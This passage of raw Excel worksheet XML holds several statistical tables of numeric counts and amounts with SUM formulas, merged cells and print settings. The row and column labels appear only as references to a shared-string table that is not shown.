      <c r="L7" s="125">
        <v>0</v>
      </c>
      <c r="M7" s="125">
        <v>0</v>
      </c>
      <c r="N7" s="160"/>
      <c r="O7" s="161"/>
      <c r="P7" s="161"/>
      <c r="Q7" s="161"/>
      <c r="R7" s="161"/>
      <c r="S7" s="161"/>
      <c r="T7" s="161"/>
      <c r="U7" s="161"/>
      <c r="V7" s="161"/>
      <c r="W7" s="124"/>
    </row>
    <row r="8" spans="1:23" ht="18.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>46</v>
      </c>
      <c r="C8" s="125">
        <v>21</v>
      </c>
      <c r="D8" s="125">
        <v>12</v>
      </c>
      <c r="E8" s="125">
        <v>4</v>
      </c>
      <c r="F8" s="125">
        <v>3</v>
      </c>
      <c r="G8" s="125">
        <v>2</v>
      </c>
      <c r="H8" s="125">
        <v>2</v>
      </c>
      <c r="I8" s="125">
        <v>2</v>
      </c>
      <c r="J8" s="125"/>
      <c r="K8" s="125"/>
      <c r="L8" s="125"/>
      <c r="M8" s="125"/>
      <c r="N8" s="123"/>
      <c r="O8" s="124"/>
      <c r="P8" s="124"/>
      <c r="Q8" s="124"/>
      <c r="R8" s="124"/>
      <c r="S8" s="124"/>
      <c r="T8" s="124"/>
      <c r="U8" s="124"/>
      <c r="V8" s="124"/>
      <c r="W8" s="124"/>
    </row>
    <row r="9" spans="1:14" ht="18.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>61</v>
      </c>
      <c r="C9" s="125"/>
      <c r="D9" s="125"/>
      <c r="E9" s="125"/>
      <c r="F9" s="125">
        <v>15</v>
      </c>
      <c r="G9" s="125">
        <v>24</v>
      </c>
      <c r="H9" s="125">
        <v>10</v>
      </c>
      <c r="I9" s="125">
        <v>10</v>
      </c>
      <c r="J9" s="125">
        <v>2</v>
      </c>
      <c r="K9" s="125"/>
      <c r="L9" s="125"/>
      <c r="M9" s="125"/>
      <c r="N9" s="42"/>
    </row>
    <row r="10" spans="1:14" ht="18.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>42</v>
      </c>
      <c r="C10" s="125">
        <v>27</v>
      </c>
      <c r="D10" s="125">
        <v>8</v>
      </c>
      <c r="E10" s="125">
        <v>1</v>
      </c>
      <c r="F10" s="125">
        <v>2</v>
      </c>
      <c r="G10" s="125">
        <v>1</v>
      </c>
      <c r="H10" s="125">
        <v>3</v>
      </c>
      <c r="I10" s="125"/>
      <c r="J10" s="125"/>
      <c r="K10" s="125"/>
      <c r="L10" s="125"/>
      <c r="M10" s="125"/>
      <c r="N10" s="42"/>
    </row>
    <row r="11" spans="1:14" ht="18.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>39</v>
      </c>
      <c r="C11" s="125">
        <v>13</v>
      </c>
      <c r="D11" s="125">
        <v>6</v>
      </c>
      <c r="E11" s="125">
        <v>4</v>
      </c>
      <c r="F11" s="125">
        <v>4</v>
      </c>
      <c r="G11" s="125">
        <v>2</v>
      </c>
      <c r="H11" s="125">
        <v>5</v>
      </c>
      <c r="I11" s="125">
        <v>4</v>
      </c>
      <c r="J11" s="125"/>
      <c r="K11" s="125">
        <v>1</v>
      </c>
      <c r="L11" s="125"/>
      <c r="M11" s="125"/>
      <c r="N11" s="42"/>
    </row>
    <row r="12" spans="1:14" ht="18.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>73</v>
      </c>
      <c r="C12" s="125">
        <v>25</v>
      </c>
      <c r="D12" s="125">
        <v>11</v>
      </c>
      <c r="E12" s="125">
        <v>5</v>
      </c>
      <c r="F12" s="125">
        <v>7</v>
      </c>
      <c r="G12" s="125">
        <v>7</v>
      </c>
      <c r="H12" s="125">
        <v>12</v>
      </c>
      <c r="I12" s="125">
        <v>6</v>
      </c>
      <c r="J12" s="125">
        <v>0</v>
      </c>
      <c r="K12" s="125">
        <v>0</v>
      </c>
      <c r="L12" s="125">
        <v>0</v>
      </c>
      <c r="M12" s="125">
        <v>0</v>
      </c>
      <c r="N12" s="42"/>
    </row>
    <row r="13" spans="1:14" ht="18.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>33</v>
      </c>
      <c r="C13" s="125">
        <v>17</v>
      </c>
      <c r="D13" s="125">
        <v>5</v>
      </c>
      <c r="E13" s="125">
        <v>2</v>
      </c>
      <c r="F13" s="125">
        <v>1</v>
      </c>
      <c r="G13" s="125">
        <v>4</v>
      </c>
      <c r="H13" s="125">
        <v>3</v>
      </c>
      <c r="I13" s="125">
        <v>1</v>
      </c>
      <c r="J13" s="125"/>
      <c r="K13" s="125"/>
      <c r="L13" s="125"/>
      <c r="M13" s="125"/>
      <c r="N13" s="42"/>
    </row>
    <row r="14" spans="1:14" ht="18.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>66</v>
      </c>
      <c r="C14" s="125">
        <v>22</v>
      </c>
      <c r="D14" s="125">
        <v>14</v>
      </c>
      <c r="E14" s="125">
        <v>5</v>
      </c>
      <c r="F14" s="125">
        <v>7</v>
      </c>
      <c r="G14" s="125">
        <v>5</v>
      </c>
      <c r="H14" s="125">
        <v>7</v>
      </c>
      <c r="I14" s="125">
        <v>2</v>
      </c>
      <c r="J14" s="125">
        <v>2</v>
      </c>
      <c r="K14" s="125">
        <v>1</v>
      </c>
      <c r="L14" s="125">
        <v>0</v>
      </c>
      <c r="M14" s="125">
        <v>1</v>
      </c>
      <c r="N14" s="42"/>
    </row>
    <row r="15" spans="1:14" ht="18.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>26</v>
      </c>
      <c r="C15" s="125">
        <v>14</v>
      </c>
      <c r="D15" s="125">
        <v>4</v>
      </c>
      <c r="E15" s="125">
        <v>2</v>
      </c>
      <c r="F15" s="125">
        <v>1</v>
      </c>
      <c r="G15" s="125">
        <v>1</v>
      </c>
      <c r="H15" s="125">
        <v>2</v>
      </c>
      <c r="I15" s="125">
        <v>0</v>
      </c>
      <c r="J15" s="125">
        <v>0</v>
      </c>
      <c r="K15" s="125">
        <v>0</v>
      </c>
      <c r="L15" s="125">
        <v>0</v>
      </c>
      <c r="M15" s="125">
        <v>2</v>
      </c>
      <c r="N15" s="42"/>
    </row>
    <row r="16" spans="2:13" ht="14.2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6" ht="14.25" customHeight="1">
      <c r="A17" s="159" t="s">
        <v>360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22"/>
      <c r="P17" s="122"/>
    </row>
    <row r="18" spans="1:16" ht="14.25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22"/>
      <c r="P18" s="122"/>
    </row>
    <row r="19" spans="1:16" ht="14.25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22"/>
      <c r="P19" s="122"/>
    </row>
    <row r="20" spans="1:16" ht="14.25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22"/>
      <c r="P20" s="122"/>
    </row>
    <row r="21" spans="1:16" ht="14.25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22"/>
      <c r="P21" s="122"/>
    </row>
    <row r="22" spans="1:16" ht="14.25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22"/>
      <c r="P22" s="122"/>
    </row>
    <row r="23" spans="1:16" ht="14.2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</row>
    <row r="24" spans="1:16" ht="14.25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</row>
    <row r="25" spans="1:16" ht="14.25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</row>
    <row r="26" spans="1:16" ht="14.25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</row>
    <row r="27" spans="1:16" ht="14.25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</row>
    <row r="28" spans="1:16" ht="14.25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 ht="14.25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</row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="3">
    <mergeCell ref="L2:M2"/>
    <mergeCell ref="A17:N22"/>
    <mergeCell ref="N5:V7"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.35433070866141736" top="0.7874015748031497" bottom="0.5905511811023623" header="0.5118110236220472" footer="0.5118110236220472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zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="6" topLeftCell="A7" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="H17" sqref="H17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="17.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="7.125" style="1" customWidth="1"/>
    <col min="2" max="10" width="11.00390625" style="1" customWidth="1"/>
    <col min="11" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="17.25" customHeight="1">
      <c r="A1" s="10" t="s">
        <v>417</v>
      </c>
      <c r="B1" s="10"/>
      <c r="C1" s="10"/>
      <c r="D1" s="5"/>
      <c r="E1" s="5"/>
      <c r="F1" s="5"/>
      <c r="G1" s="5"/>
      <c r="H1" s="5"/>
      <c r="I1" s="5"/>
      <c r="J1" s="5"/>
    </row>
    <row r="2" spans="1:10" ht="17.25" customHeight="1">
      <c r="A2" s="10"/>
      <c r="B2" s="10"/>
      <c r="C2" s="10"/>
      <c r="D2" s="5"/>
      <c r="E2" s="5"/>
      <c r="F2" s="5"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="181" t="s">
        <v>331</v>
      </c>
      <c r="J2" s="181"/>
    </row>
    <row r="3" spans="1:10" ht="17.25" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>179</v>
      </c>
      <c r="B3" s="179" t="s">
        <v>22</v>
      </c>
      <c r="C3" s="179"/>
      <c r="D3" s="179"/>
      <c r="E3" s="179"/>
      <c r="F3" s="179"/>
      <c r="G3" s="179"/>
      <c r="H3" s="179"/>
      <c r="I3" s="179"/>
      <c r="J3" s="179"/>
    </row>
    <row r="4" spans="1:10" ht="19.5" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="66" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="66"/>
      <c r="D4" s="66"/>
      <c r="E4" s="66" t="s">
        <v>133</v>
      </c>
      <c r="F4" s="66"/>
      <c r="G4" s="66"/>
      <c r="H4" s="66" t="s">
        <v>134</v>
      </c>
      <c r="I4" s="66"/>
      <c r="J4" s="66"/>
    </row>
    <row r="5" spans="1:10" ht="20.25" customHeight="1">
      <c r="A5" s="179"/>
      <c r="B5" s="62" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="62" t="s">
        <v>13</v>
      </c>
      <c r="D5" s="62" t="s">
        <v>10</v>
      </c>
      <c r="E5" s="62" t="s">
        <v>12</v>
      </c>
      <c r="F5" s="62" t="s">
        <v>13</v>
      </c>
      <c r="G5" s="62" t="s">
        <v>10</v>
      </c>
      <c r="H5" s="62" t="s">
        <v>12</v>
      </c>
      <c r="I5" s="62" t="s">
        <v>13</v>
      </c>
      <c r="J5" s="62" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="6" spans="1:10" ht="17.25" customHeight="1">
      <c r="A6" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="65">
        <f aca="true" t="shared" si="0" ref="B6:J6">SUM(B7:B17)</f>
        <v>420000</v>
      </c>
      <c r="C6" s="65">
        <f t="shared" si="0"/>
        <v>130000</v>
      </c>
      <c r="D6" s="65">
        <f t="shared" si="0"/>
        <v>550000</v>
      </c>
      <c r="E6" s="65">
        <f t="shared" si="0"/>
        <v>70000</v>
      </c>
      <c r="F6" s="65">
        <f t="shared" si="0"/>
        <v>10000</v>
      </c>
      <c r="G6" s="65">
        <f t="shared" si="0"/>
        <v>80000</v>
      </c>
      <c r="H6" s="65">
        <f t="shared" si="0"/>
        <v>350000</v>
      </c>
      <c r="I6" s="65">
        <f t="shared" si="0"/>
        <v>120000</v>
      </c>
      <c r="J6" s="65">
        <f t="shared" si="0"/>
        <v>470000</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="17.25" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="109">
        <f>SUM(E7,H7)</f>
        <v>320000</v>
      </c>
      <c r="C7" s="109">
        <f>SUM(F7,I7)</f>
        <v>130000</v>
      </c>
      <c r="D7" s="109">
        <f>SUM(B7:C7)</f>
        <v>450000</v>
      </c>
      <c r="E7" s="13">
        <v>70000</v>
      </c>
      <c r="F7" s="13">
        <v>10000</v>
      </c>
      <c r="G7" s="110">
        <v>80000</v>
      </c>
      <c r="H7" s="13">
        <v>250000</v>
      </c>
      <c r="I7" s="13">
        <v>120000</v>
      </c>
      <c r="J7" s="110">
        <v>370000</v>
      </c>
    </row>
    <row r="8" spans="1:10" ht="17.25" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="109">
        <f aca="true" t="shared" si="1" ref="B8:B17">SUM(E8,H8)</f>
        <v>0</v>
      </c>
      <c r="C8" s="109">
        <f aca="true" t="shared" si="2" ref="C8:C17">SUM(F8,I8)</f>
        <v>0</v>
      </c>
      <c r="D8" s="109">
        <f aca="true" t="shared" si="3" ref="D8:D17">SUM(B8:C8)</f>
        <v>0</v>
      </c>
      <c r="E8" s="13"/>
      <c r="F8" s="13"/>
      <c r="G8" s="110">
        <f aca="true" t="shared" si="4" ref="G8:G16">SUM(E8:F8)</f>
        <v>0</v>
      </c>
      <c r="H8" s="13"/>
      <c r="I8" s="13"/>
      <c r="J8" s="110">
        <f aca="true" t="shared" si="5" ref="J8:J16">SUM(H8:I8)</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:10" ht="17.25" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D9" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:10" ht="17.25" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D10" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E10" s="13"/>
      <c r="F10" s="13"/>
      <c r="G10" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:10" ht="17.25" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C11" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D11" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E11" s="13"/>
      <c r="F11" s="13"/>
      <c r="G11" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H11" s="13"/>
      <c r="I11" s="13"/>
      <c r="J11" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:10" ht="17.25" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D12" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E12" s="13"/>
      <c r="F12" s="13"/>
      <c r="G12" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H12" s="13"/>
      <c r="I12" s="13"/>
      <c r="J12" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:10" ht="17.25" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C13" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D13" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E13" s="22"/>
      <c r="F13" s="22"/>
      <c r="G13" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H13" s="22"/>
      <c r="I13" s="22"/>
      <c r="J13" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:10" ht="17.25" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C14" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D14" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E14" s="13"/>
      <c r="F14" s="13"/>
      <c r="G14" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H14" s="13"/>
      <c r="I14" s="13"/>
      <c r="J14" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:10" ht="17.25" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D15" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E15" s="13"/>
      <c r="F15" s="13"/>
      <c r="G15" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:10" ht="17.25" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C16" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D16" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E16" s="13"/>
      <c r="F16" s="13"/>
      <c r="G16" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H16" s="13"/>
      <c r="I16" s="13"/>
      <c r="J16" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:10" ht="17.25" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="109">
        <f t="shared" si="1"/>
        <v>100000</v>
      </c>
      <c r="C17" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D17" s="109">
        <f t="shared" si="3"/>
        <v>100000</v>
      </c>
      <c r="E17" s="13"/>
      <c r="F17" s="13"/>
      <c r="G17" s="110">
        <v>0</v>
      </c>
      <c r="H17" s="13">
        <v>100000</v>
      </c>
      <c r="I17" s="13"/>
      <c r="J17" s="110">
        <v>100000</v>
      </c>
    </row>
    <row r="18" ht="16.5" customHeight="1"/>
    <row r="19" ht="16.5" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="3">
    <mergeCell ref="B3:J3"/>
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="I2:J2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.7480314960629921" top="0.7874015748031497" bottom="0.5511811023622047" header="0.5118110236220472" footer="0.5118110236220472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T16"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B5" sqref="B5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="21" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="5.625" style="1" customWidth="1"/>
    <col min="2" max="2" width="6.75390625" style="1" customWidth="1"/>
    <col min="3" max="3" width="7.50390625" style="1" customWidth="1"/>
    <col min="4" max="4" width="7.00390625" style="1" customWidth="1"/>
    <col min="5" max="5" width="5.875" style="1" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="6.75390625" style="1" customWidth="1"/>
    <col min="7" max="7" width="6.875" style="1" customWidth="1"/>
    <col min="8" max="8" width="7.375" style="1" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="6.625" style="1" customWidth="1"/>
    <col min="10" max="10" width="7.125" style="1" customWidth="1"/>
    <col min="11" max="11" width="8.50390625" style="1" customWidth="1"/>
    <col min="12" max="13" width="8.375" style="1" customWidth="1"/>
    <col min="14" max="14" width="7.875" style="1" customWidth="1"/>
    <col min="15" max="15" width="8.50390625" style="1" bestFit="1" customWidth="1"/>
    <col min="16" max="17" width="7.75390625" style="1" customWidth="1"/>
    <col min="18" max="18" width="8.125" style="1" customWidth="1"/>
    <col min="19" max="19" width="7.25390625" style="1" customWidth="1"/>
    <col min="20" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19" ht="22.5" customHeight="1">
      <c r="A1" s="10" t="s">
        <v>418</v>
      </c>
      <c r="B1" s="10"/>
      <c r="C1" s="10"/>
      <c r="D1" s="10"/>
      <c r="E1" s="10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2.5" customHeight="1">
      <c r="A2" s="10"/>
      <c r="B2" s="10"/>
      <c r="C2" s="10"/>
      <c r="D2" s="10"/>
      <c r="E2" s="10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81" t="s">
        <v>335</v>
      </c>
      <c r="R2" s="181"/>
      <c r="S2" s="181"/>
    </row>
    <row r="3" spans="1:19" ht="19.5" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>178</v>
      </c>
      <c r="B3" s="66" t="s">
        <v>15</v>
      </c>
      <c r="C3" s="66"/>
      <c r="D3" s="66"/>
      <c r="E3" s="66"/>
      <c r="F3" s="66"/>
      <c r="G3" s="66"/>
      <c r="H3" s="66"/>
      <c r="I3" s="66"/>
      <c r="J3" s="66"/>
      <c r="K3" s="66" t="s">
        <v>135</v>
      </c>
      <c r="L3" s="66"/>
      <c r="M3" s="66"/>
      <c r="N3" s="66"/>
      <c r="O3" s="66"/>
      <c r="P3" s="66"/>
      <c r="Q3" s="66"/>
      <c r="R3" s="66"/>
      <c r="S3" s="66"/>
    </row>
    <row r="4" spans="1:19" ht="18" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>17</v>
      </c>
      <c r="D4" s="62" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="62" t="s">
        <v>4</v>
      </c>
      <c r="F4" s="62" t="s">
        <v>19</v>
      </c>
      <c r="G4" s="62" t="s">
        <v>20</v>
      </c>
      <c r="H4" s="62" t="s">
        <v>6</v>
      </c>
      <c r="I4" s="62" t="s">
        <v>7</v>
      </c>
      <c r="J4" s="62" t="s">
        <v>8</v>
      </c>
      <c r="K4" s="62" t="s">
        <v>10</v>
      </c>
      <c r="L4" s="62" t="s">
        <v>17</v>
      </c>
      <c r="M4" s="62" t="s">
        <v>18</v>
      </c>
      <c r="N4" s="62" t="s">
        <v>4</v>
      </c>
      <c r="O4" s="62" t="s">
        <v>19</v>
      </c>
      <c r="P4" s="62" t="s">
        <v>20</v>
      </c>
      <c r="Q4" s="62" t="s">
        <v>6</v>
      </c>
      <c r="R4" s="62" t="s">
        <v>7</v>
      </c>
      <c r="S4" s="62" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="5" spans="1:20" ht="17.25" customHeight="1">
      <c r="A5" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="65">
        <f aca="true" t="shared" si="0" ref="B5:S5">SUM(B6:B16)</f>
        <v>121</v>
      </c>
      <c r="C5" s="65">
        <f t="shared" si="0"/>
        <v>20</v>
      </c>
      <c r="D5" s="65">
        <f t="shared" si="0"/>
        <v>45</v>
      </c>
      <c r="E5" s="65">
        <f t="shared" si="0"/>
        <v>26</v>
      </c>
      <c r="F5" s="65">
        <f t="shared" si="0"/>
        <v>21</v>
      </c>
      <c r="G5" s="65">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="H5" s="65">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="I5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K5" s="65">
        <f t="shared" si="0"/>
        <v>9075</v>
      </c>
      <c r="L5" s="65">
        <f t="shared" si="0"/>
        <v>72</v>
      </c>
      <c r="M5" s="65">
        <f t="shared" si="0"/>
        <v>1149</v>
      </c>
      <c r="N5" s="65">
        <f t="shared" si="0"/>
        <v>1929</v>
      </c>
      <c r="O5" s="65">
        <f t="shared" si="0"/>
        <v>2921</v>
      </c>
      <c r="P5" s="65">
        <f t="shared" si="0"/>
        <v>2229</v>
      </c>
      <c r="Q5" s="65">
        <f t="shared" si="0"/>
        <v>775</v>
      </c>
      <c r="R5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="S5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="T5" s="17"/>
    </row>
    <row r="6" spans="1:20" ht="17.25" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="71">
        <f>SUM(C6:J6)</f>
        <v>14</v>
      </c>
      <c r="C6" s="13"/>
      <c r="D6" s="13">
        <v>4</v>
      </c>
      <c r="E6" s="13">
        <v>3</v>
      </c>
      <c r="F6" s="13">
        <v>3</v>
      </c>
      <c r="G6" s="13">
        <v>3</v>
      </c>
      <c r="H6" s="13">
        <v>1</v>
      </c>
      <c r="I6" s="13"/>
      <c r="J6" s="13"/>
      <c r="K6" s="71">
        <f>SUM(L6:S6)</f>
        <v>1995</v>
      </c>
      <c r="L6" s="13"/>
      <c r="M6" s="13">
        <v>170</v>
      </c>
      <c r="N6" s="13">
        <v>232</v>
      </c>
      <c r="O6" s="13">
        <v>429</v>
      </c>
      <c r="P6" s="13">
        <v>689</v>
      </c>
      <c r="Q6" s="13">
        <v>475</v>
      </c>
      <c r="R6" s="13"/>
      <c r="S6" s="13"/>
      <c r="T6" s="16"/>
    </row>
    <row r="7" spans="1:20" ht="17.25" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="71">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:J7)</f>
        <v>16</v>
      </c>
      <c r="C7" s="13"/>
      <c r="D7" s="13">
        <v>6</v>
      </c>
      <c r="E7" s="13">
        <v>6</v>
      </c>
      <c r="F7" s="13">
        <v>4</v>
      </c>
      <c r="G7" s="13"/>
      <c r="H7" s="13"/>
      <c r="I7" s="13"/>
      <c r="J7" s="13"/>
      <c r="K7" s="71">
        <f>SUM(L7:S7)</f>
        <v>1137</v>
      </c>
      <c r="L7" s="13"/>
      <c r="M7" s="13">
        <v>157</v>
      </c>
      <c r="N7" s="13">
        <v>417</v>
      </c>
      <c r="O7" s="13">
        <v>563</v>
      </c>
      <c r="P7" s="13"/>
      <c r="Q7" s="13"/>
      <c r="R7" s="13"/>
      <c r="S7" s="13"/>
      <c r="T7" s="16"/>
    </row>
    <row r="8" spans="1:20" ht="17.25" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="71">
        <f t="shared" si="1"/>
        <v>18</v>
      </c>
      <c r="C8" s="13">
        <v>0</v>
      </c>
      <c r="D8" s="13">
        <v>3</v>
      </c>
      <c r="E8" s="13">
        <v>7</v>
      </c>
      <c r="F8" s="13">
        <v>3</v>
      </c>
      <c r="G8" s="13">
        <v>4</v>
      </c>
      <c r="H8" s="13">
        <v>1</v>
      </c>
      <c r="I8" s="13">
        <v>0</v>
      </c>
      <c r="J8" s="13">
        <v>0</v>
      </c>
      <c r="K8" s="71">
        <f>SUM(L8:S8)</f>
        <v>2257</v>
      </c>
      <c r="L8" s="13">
        <v>0</v>
      </c>
      <c r="M8" s="13">
        <v>95</v>
      </c>
      <c r="N8" s="13">
        <v>543</v>
      </c>
      <c r="O8" s="13">
        <v>359</v>
      </c>
      <c r="P8" s="13">
        <v>960</v>
      </c>
      <c r="Q8" s="13">
        <v>300</v>
      </c>
      <c r="R8" s="13">
        <v>0</v>
      </c>
      <c r="S8" s="13">
        <v>0</v>
      </c>
      <c r="T8" s="16"/>
    </row>
    <row r="9" spans="1:20" ht="17.25" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="13"/>
      <c r="D9" s="13"/>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="13"/>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="13"/>
      <c r="K9" s="71">
